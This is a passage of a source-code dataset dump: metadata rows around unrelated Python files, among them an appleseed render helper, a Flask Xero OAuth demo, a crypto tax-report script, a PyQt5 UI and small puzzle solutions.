"BSD-3-Clause"
] | 25
|
2018-09-17T00:10:30.000Z
|
2021-11-07T06:41:35.000Z
|
appleseed_python.py
|
AllegorithmicSAS/sat-scons
|
3eea609385fb9bdd93562097d302a3707c3c6ebe
|
[
"BSD-3-Clause"
] | null | null | null |
appleseed_python.py
|
AllegorithmicSAS/sat-scons
|
3eea609385fb9bdd93562097d302a3707c3c6ebe
|
[
"BSD-3-Clause"
] | 3
|
2018-08-28T15:01:43.000Z
|
2021-05-04T16:54:51.000Z
|
import os
import subprocess
import threading
mutex = threading.Lock()
def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
mutex.acquire()
try:
# Read the template file from disk.
with open("scene_template.appleseed", "r") as file:
project_text = file.read()
# Substitute variables by their values.
project_text = project_text.replace("$baseColorTexturePath", base_color_tex)
project_text = project_text.replace("$normalTexturePath", normal_tex)
project_text = project_text.replace("$roughnessTexturePath", roughness_tex)
project_text = project_text.replace("$metallicTexturePath", metallic_tex)
project_text = project_text.replace("$frameWidth", str(resolution[0]))
project_text = project_text.replace("$frameHeight", str(resolution[1]))
# Write the new project file to disk.
project_file = os.path.splitext(target_file)[0] + ".appleseed"
with open(project_file, "w") as file:
file.write(project_text)
# Invoke appleseed to render the project file.
appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
except Exception as e:
print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
raise
finally:
mutex.release()
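# Minimal usage sketch (paths and resolution are assumptions for
# illustration; "scene_template.appleseed" must exist in the working
# directory, as render_appleseed expects):
if __name__ == "__main__":
    render_appleseed(
        target_file="out/preview.png",
        base_color_tex="tex/base_color.png",
        normal_tex="tex/normal.png",
        roughness_tex="tex/roughness.png",
        metallic_tex="tex/metallic.png",
        resolution=(512, 512),
        appleseed_path="/opt/appleseed",
    )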
| 40.307692
| 125
| 0.688295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 441
| 0.280534
|
42793637f0ad1d6b8bdb63c8ad74420df516a382
| 1,327
|
py
|
Python
|
conjureup/ui/views/credentials.py
|
iMichka/conjure-up
|
8e4599e6f58b52163384150d8d71e7802462d126
|
[
"MIT"
] | 1
|
2019-06-26T23:39:13.000Z
|
2019-06-26T23:39:13.000Z
|
conjureup/ui/views/credentials.py
|
iMichka/conjure-up
|
8e4599e6f58b52163384150d8d71e7802462d126
|
[
"MIT"
] | null | null | null |
conjureup/ui/views/credentials.py
|
iMichka/conjure-up
|
8e4599e6f58b52163384150d8d71e7802462d126
|
[
"MIT"
] | 1
|
2020-10-05T14:42:31.000Z
|
2020-10-05T14:42:31.000Z
|
from ubuntui.utils import Padding
from ubuntui.widgets.hr import HR
from conjureup.app_config import app
from conjureup.ui.views.base import BaseView, SchemaFormView
from conjureup.ui.widgets.selectors import MenuSelectButtonList
class NewCredentialView(SchemaFormView):
title = "New Credential Creation"
def __init__(self, *args, **kwargs):
cloud_type = app.provider.cloud_type.upper()
self.subtitle = "Enter your {} credentials".format(cloud_type)
super().__init__(*args, **kwargs)
class CredentialPickerView(BaseView):
title = "Choose a Credential"
subtitle = "Please select an existing credential, " \
"or choose to add a new one."
footer = 'Please press [ENTER] on highlighted credential to proceed.'
def __init__(self, credentials, default, submit_cb, back_cb):
self.credentials = credentials
self.default = default
self.submit_cb = submit_cb
self.prev_screen = back_cb
super().__init__()
def build_widget(self):
widget = MenuSelectButtonList(self.credentials, self.default)
widget.append(Padding.line_break(""))
widget.append(HR())
widget.append_option("Add a new credential", None)
return widget
def submit(self):
self.submit_cb(self.widget.selected)
| 33.175
| 73
| 0.694047
| 1,090
| 0.821402
| 0
| 0
| 0
| 0
| 0
| 0
| 226
| 0.170309
|
427ab04e73a73ae528a76eac0fdda4742addfcf9
| 355
|
py
|
Python
|
sleekxmpp/plugins/__init__.py
|
aristanetworks/SleekXMPP
|
91f53bf1964a564f6f12477a31884e9ec38cef75
|
[
"MIT"
] | null | null | null |
sleekxmpp/plugins/__init__.py
|
aristanetworks/SleekXMPP
|
91f53bf1964a564f6f12477a31884e9ec38cef75
|
[
"MIT"
] | 1
|
2020-04-10T22:09:06.000Z
|
2020-04-10T22:09:06.000Z
|
sleekxmpp/plugins/__init__.py
|
aristanetworks/SleekXMPP
|
91f53bf1964a564f6f12477a31884e9ec38cef75
|
[
"MIT"
] | 1
|
2019-12-05T12:10:16.000Z
|
2019-12-05T12:10:16.000Z
|
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
__all__ = ['xep_0004', 'xep_0012', 'xep_0030', 'xep_0033', 'xep_0045',
'xep_0050', 'xep_0085', 'xep_0092', 'xep_0199', 'gmail_notify',
'xep_0060', 'xep_0202']
| 32.272727
| 74
| 0.63662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 297
| 0.83662
|
427af261bc83da6fc8ac5c1ea1e2a2473e51e220
| 5,276
|
py
|
Python
|
main.py
|
pwillworth/dfkreport
|
ae10226430a3a74ac3c07ae888cab14dde778db8
|
[
"Apache-2.0"
] | 11
|
2022-01-18T17:36:12.000Z
|
2022-03-21T21:09:17.000Z
|
main.py
|
pwillworth/dfkreport
|
ae10226430a3a74ac3c07ae888cab14dde778db8
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
pwillworth/dfkreport
|
ae10226430a3a74ac3c07ae888cab14dde778db8
|
[
"Apache-2.0"
] | 4
|
2022-01-18T18:37:48.000Z
|
2022-01-22T02:14:48.000Z
|
#!/usr/bin/env python3
import transactions
import taxmap
import db
import settings
import datetime
import argparse
import uuid
import pickle
import jsonpickle
import logging
import logging.handlers
import traceback
def main():
handler = logging.handlers.RotatingFileHandler('../main.log', maxBytes=33554432, backupCount=10)
logging.basicConfig(handlers=[handler], level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logging.info('We got a report request')
parser = argparse.ArgumentParser()
parser.add_argument("wallet", help="The evm compatible wallet address to generate for")
parser.add_argument("startDate", help="The starting date for the report")
parser.add_argument("endDate", help="The ending date for the report")
parser.add_argument("--costbasis", choices=['fifo','lifo','hifo','acb'], help="Method for mapping cost basis to gains")
parser.add_argument("--chains", choices=['1','2','3','4','5','6','7'], help="Bitwise integer of blockchains to include 1=Harmony,2=Avax,4=DFKChain")
args = parser.parse_args()
    if args.costbasis is None:
costBasis = 'fifo'
else:
costBasis = args.costbasis
page_size = settings.TX_PAGE_SIZE
txResult = 0
txData = []
moreOptions = db.ReportOptions()
    # the list of transactions is loaded from a file if available, otherwise fetched
reportInfo = db.findReport(args.wallet, args.startDate, args.endDate)
    if reportInfo is not None and reportInfo[5] > 0 and len(reportInfo[8]) > 0:
includedChains = reportInfo[12]
with open('../transactions/{0}'.format(reportInfo[8]), 'rb') as file:
txData = pickle.load(file)
else:
# generate.py pre-generates report record, but if running outside of that, create one
        if reportInfo is None:
generateTime = datetime.datetime.now()
txResult = transactions.getTransactionCount(args.wallet)
includedChains = 1
db.createReport(args.wallet, args.startDate, args.endDate, int(datetime.datetime.timestamp(generateTime)), txResult, costBasis, includedChains, 1)
else:
includedChains = reportInfo[12]
try:
moreOptions = jsonpickle.loads(reportInfo[13])
except Exception as err:
logging.warning('Ignoring failure to load more options, probably old ui not setting it.')
logging.info('Loading transactions list for {0}'.format(args.wallet))
# Scale up default page size for very large accounts
        if reportInfo is not None and reportInfo[4] > page_size*50:
page_size = min(1000, page_size*5)
try:
txData = transactions.getTransactionList(args.wallet, args.startDate, args.endDate, page_size, includedChains)
except Exception as err:
logging.error('Unexpected Error {0} fetching transaction list, setting report to failure.'.format(err))
traceback.print_exc()
db.updateReportError(args.wallet, args.startDate, args.endDate, 8)
return 1
        # The transactions are written to a file and the record is updated to indicate fetching is complete
transactionsFile = uuid.uuid4().hex
with open('../transactions/{0}'.format(transactionsFile), 'wb') as f:
pickle.dump(txData, f)
try:
db.completeTransactions(args.wallet, args.startDate, args.endDate, transactionsFile)
except Exception as err:
logging.error('DB report update tx complete failure: {0}'.format(str(err)))
# With transaction list, we now generate the events and tax map
try:
reportData = taxmap.buildTaxMap(txData, args.wallet, datetime.datetime.strptime(args.startDate, '%Y-%m-%d').date(), datetime.datetime.strptime(args.endDate, '%Y-%m-%d').date(), costBasis, includedChains, moreOptions)
except Exception as err:
logging.error('Unexpected Error {0} building tax map, setting report to failure.'.format(err))
traceback.print_exc()
        # Set a different code when web3.exceptions.TransactionNotFound
        # so we can relay that it is a network RPC issue worth retrying later
if str(err) == "{'message': 'Relay attempts exhausted', 'code': -32050}":
statusCode = 8
elif "Bad Gateway for url" in str(err) or "Service Unavailable" in str(err) or "Max retries exceeded" in str(err):
statusCode = 8
else:
statusCode = 9
try:
db.updateReportError(args.wallet, args.startDate, args.endDate, statusCode)
except Exception as err:
logging.error('DB report update error failure: {0}'.format(str(err)))
return 1
for item in reportData['taxes']:
logging.debug(str(item.__dict__) + '\n')
    # The results are written to a file and the record is updated to signal completion
reportFile = uuid.uuid4().hex
with open('../reports/{0}'.format(reportFile), 'wb') as f:
pickle.dump(reportData, f)
try:
db.completeReport(args.wallet, args.startDate, args.endDate, reportFile)
except Exception as err:
logging.error('DB report update complete failure: {0}'.format(str(err)))
if __name__ == "__main__":
main()
| 47.531532
| 224
| 0.666035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,624
| 0.307809
|
427b0f2bb086452498a9bfd3a4dc95c14c7879d6
| 127
|
py
|
Python
|
src/tarski/fstrips/contingent/__init__.py
|
phoeft670/tarski
|
7d955e535fbbca012bfd1a12402b97febc6b35b9
|
[
"Apache-2.0"
] | 29
|
2018-11-26T20:31:04.000Z
|
2021-12-29T11:08:40.000Z
|
src/tarski/fstrips/contingent/__init__.py
|
phoeft670/tarski
|
7d955e535fbbca012bfd1a12402b97febc6b35b9
|
[
"Apache-2.0"
] | 101
|
2018-06-07T13:10:01.000Z
|
2022-03-11T11:54:00.000Z
|
src/tarski/fstrips/contingent/__init__.py
|
phoeft670/tarski
|
7d955e535fbbca012bfd1a12402b97febc6b35b9
|
[
"Apache-2.0"
] | 18
|
2018-11-01T22:44:39.000Z
|
2022-02-28T04:57:15.000Z
|
from .problem import ContingentProblem as Problem
from ..action import Action
from .sensor import Sensor
from . import errors
| 25.4
| 49
| 0.811024
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
427bd9dc45f6695e499240fef94ddec3e4b3fe88
| 80
|
py
|
Python
|
p40-49/p48.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | 1
|
2015-10-11T15:53:00.000Z
|
2015-10-11T15:53:00.000Z
|
p40-49/p48.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
p40-49/p48.py
|
kbrose/project_euler
|
f582ef1887f44628997e05d88253adad0822d6b9
|
[
"Unlicense"
] | null | null | null |
total = 0
for i in range(1, 1001):
	total = total + i**i
print(total % 10000000000)
| 11.428571
| 24
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
427dedadfbbcbe3c95d00fdafba41ac3a4018d6f
| 2,121
|
py
|
Python
|
property_proteome/length/run.py
|
rrazban/proteomevis_scripts
|
2b6309a78287ffab4ee745383c21b9f474b93b60
|
[
"MIT"
] | 1
|
2020-11-11T06:14:10.000Z
|
2020-11-11T06:14:10.000Z
|
property_proteome/length/run.py
|
rrazban/proteomevis_scripts
|
2b6309a78287ffab4ee745383c21b9f474b93b60
|
[
"MIT"
] | null | null | null |
property_proteome/length/run.py
|
rrazban/proteomevis_scripts
|
2b6309a78287ffab4ee745383c21b9f474b93b60
|
[
"MIT"
] | 1
|
2019-05-28T19:13:24.000Z
|
2019-05-28T19:13:24.000Z
|
#!/usr/bin/python
help_msg = 'get uniprot length of entire proteome'
import os, sys
CWD = os.getcwd()
UTLTS_DIR = CWD[:CWD.index('proteomevis_scripts')]+'/proteomevis_scripts/utlts'
sys.path.append(UTLTS_DIR)
from parse_user_input import help_message
from read_in_file import read_in
from parse_data import organism
from uniprot_api import UniProtAPI
from output import writeout
def parse_chain_length(words, i, verbose): #put this in class
if len(words)==1: #does not capture UniProt peptide case
if verbose:
			print('No chain found: {0}. Structure is discarded'.format(words))
length = ''
elif '>' in words[i+1]:
length = ''
elif '?' in words[i+1]:
length = ''
elif '?' in words[i] or '<' in words[i]:
if verbose:
			print('No starting residue for chain: {0}'.format(words))
length = int(words[i+1])
else:
length = int(words[i+1]) - int(words[i]) + 1
return length
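# Example behaviour (assumed, for illustration): for a CHAIN feature whose
# columns read "23 120", parse_chain_length returns 120 - 23 + 1 = 98. An
# end column containing '>' or '?' yields '', a start column containing
# '?' or '<' falls back to the end position alone, and a missing chain
# yields ''.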
class UniProtLength():
def __init__(self, verbose, d_ref):
self.verbose = verbose
self.d_ref = d_ref
uniprotapi = UniProtAPI(['id', 'feature(CHAIN)'])
if organism=='new_protherm':
			print(len(d_ref))
self.labels, self.raw_data = uniprotapi.uniprot_info(d_ref.keys())
else:
self.labels, self.raw_data = uniprotapi.organism_info()
self.d_output = {}
def run(self):
for line in self.raw_data:
words = line.split()
uniprot = words[self.labels.index('Entry')]
if uniprot in self.d_ref:
chain_length_i = self.labels.index('Chain')+1
chain_length = parse_chain_length(words, chain_length_i, self.verbose)
if chain_length:
self.d_output[uniprot] = chain_length
return self.d_output
if __name__ == "__main__":
args = help_message(help_msg, bool_add_verbose = True)
d_ref = read_in('Entry', 'Gene names (ordered locus )', filename = 'proteome')
uniprot_length = UniProtLength(args.verbose, d_ref)
d_output = uniprot_length.run()
if organism!='protherm':
		d_output = {d_ref[uniprot]: res for uniprot, res in d_output.items()}
xlabel = 'oln'
else: #not supported for ProTherm
xlabel = 'uniprot'
writeout([xlabel, 'length'], d_output, filename = 'UniProt')
| 29.054795
| 87
| 0.705799
| 726
| 0.342291
| 0
| 0
| 0
| 0
| 0
| 0
| 433
| 0.204149
|
427e1e9e41044ab46aedd645fb3078c3369fa522
| 2,086
|
py
|
Python
|
machine_learning/torch_time_series_forecasting/src/data/dataset.py
|
iimuz/til
|
b100438e8ce2f369331b3be215a4b9cdce9ffda5
|
[
"MIT"
] | 4
|
2020-07-25T01:20:08.000Z
|
2020-10-03T12:58:15.000Z
|
machine_learning/torch_time_series_forecasting/src/data/dataset.py
|
iimuz/til
|
b100438e8ce2f369331b3be215a4b9cdce9ffda5
|
[
"MIT"
] | 29
|
2019-09-30T08:04:14.000Z
|
2022-03-12T13:51:08.000Z
|
machine_learning/torch_time_series_forecasting/src/data/dataset.py
|
iimuz/til
|
b100438e8ce2f369331b3be215a4b9cdce9ffda5
|
[
"MIT"
] | 1
|
2020-08-14T05:15:51.000Z
|
2020-08-14T05:15:51.000Z
|
"""データセットをダウンロードするためのスクリプトです."""
# default packages
import logging
import pathlib
import traceback
import urllib.request as request
# third party
import pandas as pd
import tqdm as tqdm_std
# my packages
import src.data.directory as directory
# logger
logger = logging.getLogger(__name__)
class TqdmUpTo(tqdm_std.tqdm):
"""Provides `update_to(n)` which uses `tqdm.update(delta_n)`.
Args:
tqdm (tqdm): tqdm
"""
def update_to(self, b: int = 1, bsize: int = 1, tsize: int = None) -> None:
""" update function
Args:
b (int, optional): Number of blocks transferred. Defaults to 1.
bsize (int, optional): Size of each block (in tqdm units). Defaults to 1.
tsize ([type], optional): Total size (in tqdm units). Defaults to None.
"""
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def get_raw_filepath() -> pathlib.Path:
url = get_raw_url()
filepath = directory.get_raw().joinpath(url.split("/")[-1])
return filepath
def get_raw_url() -> str:
url = (
"https://storage.googleapis.com/tensorflow/tf-keras-datasets/"
"jena_climate_2009_2016.csv.zip"
)
return url
def _main() -> None:
"""メインの実行スクリプト."""
logging.basicConfig(level=logging.INFO)
filepath = get_raw_filepath()
if filepath.exists() is False:
url = get_raw_url()
filepath.parent.mkdir(exist_ok=True, parents=True)
with TqdmUpTo(
unit="B", unit_scale=True, miniters=1, desc=filepath.name
) as pbar:
request.urlretrieve(
url, filename=filepath, reporthook=pbar.update_to, data=None
)
else:
logger.info(f"data already exists: {filepath}")
# show dataset description.
df = pd.read_csv(filepath)
logger.info(df.info())
logger.info(df.head())
logger.info(df.tail())
if __name__ == "__main__":
try:
_main()
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
| 25.13253
| 85
| 0.622244
| 624
| 0.289157
| 0
| 0
| 0
| 0
| 0
| 0
| 743
| 0.3443
|
427f14f88f6ffd13fff4e9351ec1d15fe8db0b86
| 3,320
|
py
|
Python
|
app.py
|
aracnid/i-xero
|
2fb2f093a8a92e0ba2f4cdbe440e962a38c09f7e
|
[
"MIT"
] | null | null | null |
app.py
|
aracnid/i-xero
|
2fb2f093a8a92e0ba2f4cdbe440e962a38c09f7e
|
[
"MIT"
] | null | null | null |
app.py
|
aracnid/i-xero
|
2fb2f093a8a92e0ba2f4cdbe440e962a38c09f7e
|
[
"MIT"
] | null | null | null |
"""Primary application.
"""
import json
import logging
import logging.config
import os
import sys
from flask import url_for, render_template, redirect, request
from i_xero import Xero2
from i_xero.i_flask import FlaskInterface
from utils import jsonify, serialize_model
# initialize logging
# The SlackBot app doesn't handle logging in the same way.
# I tried to pass in a logger object from aracnid_logger,
# but it seems to disable all loggers
logging_filename = os.environ.get('LOGGING_CONFIG_FILE')
command_dir = os.path.dirname(sys.argv[0])
logging_dir = os.path.join(os.getcwd(), command_dir)
logging_path = os.path.join(os.getcwd(), logging_filename)
with open(logging_path, 'rt') as file:
logging_config = json.load(file)
formatter = os.environ.get('LOGGING_FORMATTER')
logging_config['handlers']['console']['formatter'] = formatter
logging.config.dictConfig(logging_config)
env_str = os.environ.get('LOG_UNHANDLED_EXCEPTIONS')
LOG_UNHANDLED_EXCEPTIONS = env_str.lower() in ('true', 'yes') if env_str else False
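# For reference, a minimal shape for the file named by LOGGING_CONFIG_FILE
# (an assumed example, not the project's actual config; note the 'console'
# handler, whose formatter is overridden above):
#
# {
#   "version": 1,
#   "formatters": {"plain": {"format": "%(levelname)s %(message)s"}},
#   "handlers": {"console": {"class": "logging.StreamHandler",
#                            "formatter": "plain"}},
#   "root": {"level": "INFO", "handlers": ["console"]}
# }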
# configure flask application
flask_app = FlaskInterface(__name__).get_app()
# configure xero application
xero_app = Xero2(flask_app)
@flask_app.route("/")
def index():
xero_access = dict(xero_app.obtain_xero_oauth2_token() or {})
return render_template(
"code.html",
title="Home | oauth token",
code=jsonify(xero_access),
)
@flask_app.route("/login")
def login():
redirect_url = url_for("oauth_callback", _external=True)
response = xero_app.oauth_app.authorize(callback_uri=redirect_url)
return response
@flask_app.route("/callback")
def oauth_callback():
try:
response = xero_app.oauth_app.authorized_response()
except Exception as e:
print(e)
raise
    # TODO: validate state value
if response is None or response.get("access_token") is None:
return "Access denied: response=%s" % response
xero_app.store_xero_oauth2_token(response)
return redirect(url_for("index", _external=True))
@flask_app.route("/logout")
def logout():
xero_app.store_xero_oauth2_token(None)
return redirect(url_for("index", _external=True))
@flask_app.route("/refresh-token")
def refresh_token():
xero_token = xero_app.obtain_xero_oauth2_token()
new_token = xero_app.refresh_token()
return render_template(
"code.html",
title="Xero OAuth2 token",
code=jsonify({"Old Token": xero_token, "New token": new_token}),
sub_title="token refreshed",
)
@flask_app.route("/tenants")
def tenants():
available_tenants = xero_app.get_tenants()
if available_tenants is None:
return redirect(url_for("login", _external=True))
return render_template(
"code.html",
title="Xero Tenants",
code=jsonify(available_tenants),
)
@flask_app.route("/invoices")
def get_invoices():
invoices = xero_app.get_invoices()
if invoices is None:
return redirect(url_for("login", _external=True))
code = serialize_model(invoices)
sub_title = "Total invoices found: {}".format(len(invoices.invoices))
return render_template(
"code.html", title="Invoices", code=code, sub_title=sub_title
)
# start the app locally
if __name__ == '__main__':
flask_app.run(host='localhost', port=5000)
| 28.376068
| 83
| 0.71506
| 0
| 0
| 0
| 0
| 2,035
| 0.612952
| 0
| 0
| 764
| 0.23012
|
427fcbdb91cef4c0c0751c48d3eb5d865ef45367
| 8,023
|
py
|
Python
|
ui/Ui_main.py
|
realm520/aimless
|
772e87f5b5a00eeac88be948e424310128fcec1a
|
[
"MIT"
] | null | null | null |
ui/Ui_main.py
|
realm520/aimless
|
772e87f5b5a00eeac88be948e424310128fcec1a
|
[
"MIT"
] | null | null | null |
ui/Ui_main.py
|
realm520/aimless
|
772e87f5b5a00eeac88be948e424310128fcec1a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'F:\work\code\pyqt5\ui\main.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(963, 727)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(571, 0))
self.tabWidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout.setObjectName("verticalLayout")
self.label = QtWidgets.QLabel(self.tab)
self.label.setObjectName("label")
self.verticalLayout.addWidget(self.label)
self.txtRaw = QtWidgets.QTextEdit(self.tab)
self.txtRaw.setObjectName("txtRaw")
self.verticalLayout.addWidget(self.txtRaw)
self.groupBox = QtWidgets.QGroupBox(self.tab)
self.groupBox.setMinimumSize(QtCore.QSize(0, 0))
self.groupBox.setMaximumSize(QtCore.QSize(500, 16777215))
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.btnEncoding = QtWidgets.QPushButton(self.groupBox)
self.btnEncoding.setObjectName("btnEncoding")
self.horizontalLayout.addWidget(self.btnEncoding)
self.btnDecoding = QtWidgets.QPushButton(self.groupBox)
self.btnDecoding.setObjectName("btnDecoding")
self.horizontalLayout.addWidget(self.btnDecoding)
self.btnExchange = QtWidgets.QPushButton(self.groupBox)
self.btnExchange.setObjectName("btnExchange")
self.horizontalLayout.addWidget(self.btnExchange)
self.btnClear = QtWidgets.QPushButton(self.groupBox)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnClear.sizePolicy().hasHeightForWidth())
self.btnClear.setSizePolicy(sizePolicy)
self.btnClear.setObjectName("btnClear")
self.horizontalLayout.addWidget(self.btnClear)
self.cboxCodecType = QtWidgets.QComboBox(self.groupBox)
self.cboxCodecType.setObjectName("cboxCodecType")
self.cboxCodecType.addItem("")
self.horizontalLayout.addWidget(self.cboxCodecType)
self.verticalLayout.addWidget(self.groupBox)
self.label_2 = QtWidgets.QLabel(self.tab)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.txtResult = QtWidgets.QTextEdit(self.tab)
self.txtResult.setObjectName("txtResult")
self.verticalLayout.addWidget(self.txtResult)
self.tabWidget.addTab(self.tab, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.tab_2)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.txtJson = QtWidgets.QTextEdit(self.tab_2)
self.txtJson.setObjectName("txtJson")
self.verticalLayout_2.addWidget(self.txtJson)
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setMinimumSize(QtCore.QSize(0, 50))
self.groupBox_2.setObjectName("groupBox_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.groupBox_2)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.btnJsonFormat = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonFormat.setObjectName("btnJsonFormat")
self.horizontalLayout_2.addWidget(self.btnJsonFormat)
self.btnJsonCompress = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCompress.setObjectName("btnJsonCompress")
self.horizontalLayout_2.addWidget(self.btnJsonCompress)
self.btnJsonEscape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonEscape.setObjectName("btnJsonEscape")
self.horizontalLayout_2.addWidget(self.btnJsonEscape)
self.btnJsonDeescape = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonDeescape.setObjectName("btnJsonDeescape")
self.horizontalLayout_2.addWidget(self.btnJsonDeescape)
self.btnJsonCopy = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonCopy.setObjectName("btnJsonCopy")
self.horizontalLayout_2.addWidget(self.btnJsonCopy)
self.btnJsonClear = QtWidgets.QPushButton(self.groupBox_2)
self.btnJsonClear.setObjectName("btnJsonClear")
self.horizontalLayout_2.addWidget(self.btnJsonClear)
self.verticalLayout_2.addWidget(self.groupBox_2)
self.tabWidget.addTab(self.tab_2, "")
self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 963, 23))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
self.btnClear.clicked.connect(self.txtResult.clear)
self.btnClear.clicked.connect(self.txtRaw.clear)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.label.setText(_translate("MainWindow", "Raw Text:"))
self.groupBox.setTitle(_translate("MainWindow", "Operation"))
self.btnEncoding.setText(_translate("MainWindow", "Encoding"))
self.btnDecoding.setText(_translate("MainWindow", "Decoding"))
self.btnExchange.setText(_translate("MainWindow", "Exchange"))
self.btnClear.setText(_translate("MainWindow", "Clear"))
self.cboxCodecType.setItemText(0, _translate("MainWindow", "Base64"))
self.label_2.setText(_translate("MainWindow", "Result Text:"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Codec"))
self.groupBox_2.setTitle(_translate("MainWindow", "Operation"))
self.btnJsonFormat.setText(_translate("MainWindow", "Format"))
self.btnJsonCompress.setText(_translate("MainWindow", "Compress"))
self.btnJsonEscape.setText(_translate("MainWindow", "Escape"))
self.btnJsonDeescape.setText(_translate("MainWindow", "De-Escape"))
self.btnJsonCopy.setText(_translate("MainWindow", "Copy"))
self.btnJsonClear.setText(_translate("MainWindow", "Clear"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Json"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 52.782895
| 108
| 0.720429
| 7,537
| 0.939424
| 0
| 0
| 0
| 0
| 0
| 0
| 978
| 0.1219
|
42835a66857dcf283ba037650081bbeeec2eb903
| 587
|
py
|
Python
|
leetcode/345.reverse-vowels-of-a-string.py
|
geemaple/algorithm
|
68bc5032e1ee52c22ef2f2e608053484c487af54
|
[
"MIT"
] | 177
|
2017-08-21T08:57:43.000Z
|
2020-06-22T03:44:22.000Z
|
leetcode/345.reverse-vowels-of-a-string.py
|
geemaple/algorithm
|
68bc5032e1ee52c22ef2f2e608053484c487af54
|
[
"MIT"
] | 2
|
2018-09-06T13:39:12.000Z
|
2019-06-03T02:54:45.000Z
|
leetcode/345.reverse-vowels-of-a-string.py
|
geemaple/algorithm
|
68bc5032e1ee52c22ef2f2e608053484c487af54
|
[
"MIT"
] | 23
|
2017-08-23T06:01:28.000Z
|
2020-04-20T03:17:36.000Z
|
class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s)
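# Example (assumed): Solution().reverseVowels("leetcode") == "leotcede"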
| 22.576923
| 47
| 0.294719
| 587
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 70
| 0.11925
|
4283b88a83b93254b8e97d4642f0ca0d5d69279d
| 68
|
py
|
Python
|
examples/02_pybind/01_basic/example.py
|
BlockResearchGroup/WS_interoperability
|
604ab29c242b30b2ee9125a589afe69010ba1844
|
[
"MIT"
